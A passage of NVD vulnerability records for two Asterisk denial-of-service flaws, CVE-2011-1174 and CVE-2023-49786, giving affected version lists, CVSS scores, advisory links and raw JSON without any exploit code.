              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "manager.c in Asterisk Open Source 1.6.1.x before 1.6.1.24, 1.6.2.x before 1.6.2.17.2, and 1.8.x before 1.8.3.2 allows remote attackers to cause a denial of service (CPU and memory consumption) via a series of manager sessions involving invalid data."
    },
    {
      "lang": "es",
      "value": "manager.c en Asterisk Open Source v1.6.1.x anterior a v1.6.1.24, v1.6.2.x anterior a v1.6.2.17.2, y v1.8.x anterior a v1.8.3.2 permite a atacantes remotos generar una denegaci\u00f3n de servicio (agotamiento de memoria y CPU) mediante una conjunto de sesiones que comprenden datos no v\u00e1lidos."
    }
  ],
  "id": "CVE-2011-1174",
  "lastModified": "2024-11-21T01:25:43.227",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-03-31T22:55:03.147",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-003.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://securitytracker.com/id?1025223"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securityfocus.com/bid/46897"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0686"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0790"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688675"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66139"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025223"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/46897"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0686"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0790"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688675"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66139"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2023-12-14 20:15

Modified

2024-11-21 08:33

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.

References

URL	Tags
security-advisories@github.com	http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html	Exploit, Third Party Advisory, VDB Entry
security-advisories@github.com	http://seclists.org/fulldisclosure/2023/Dec/24	Exploit, Mailing List, Third Party Advisory
security-advisories@github.com	http://www.openwall.com/lists/oss-security/2023/12/15/7	Exploit, Mailing List
security-advisories@github.com	https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race	Exploit
security-advisories@github.com	https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05	Patch
security-advisories@github.com	https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq	Exploit, Vendor Advisory
security-advisories@github.com	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2023/Dec/24	Exploit, Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2023/12/15/7	Exploit, Mailing List
af854a3a-2127-422b-91ae-364da2661108	https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race	Exploit
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	21.0.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
              "versionEndExcluding": "18.20.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
              "versionEndExcluding": "20.5.1",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
    },
    {
      "lang": "es",
      "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anteriores a las versiones 18.20.1, 20.5.1 y 21.0.1; as\u00ed como certificado-asterisco anterior a 18.9-cert6; Asterisk es susceptible a un DoS debido a una condici\u00f3n de ejecuci\u00f3n en la fase \"hello handshake\" del protocolo DTLS cuando maneja DTLS-SRTP para la configuraci\u00f3n de medios. Este ataque se puede realizar de forma continua, negando as\u00ed nuevas llamadas cifradas DTLS-SRTP durante el ataque. El abuso de esta vulnerabilidad puede provocar una denegaci\u00f3n de servicio masiva en servidores Asterisk vulnerables para llamadas que dependen de DTLS-SRTP. El commit d7d7764cb07c8a1872804321302ef93bf62cba05 contiene una soluci\u00f3n, que forma parte de las versiones 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
    }
  ],
  "id": "CVE-2023-49786",
  "lastModified": "2024-11-21T08:33:50.533",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-12-14T20:15:52.927",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mailing List"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit"
      ],
      "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-703"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-362"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

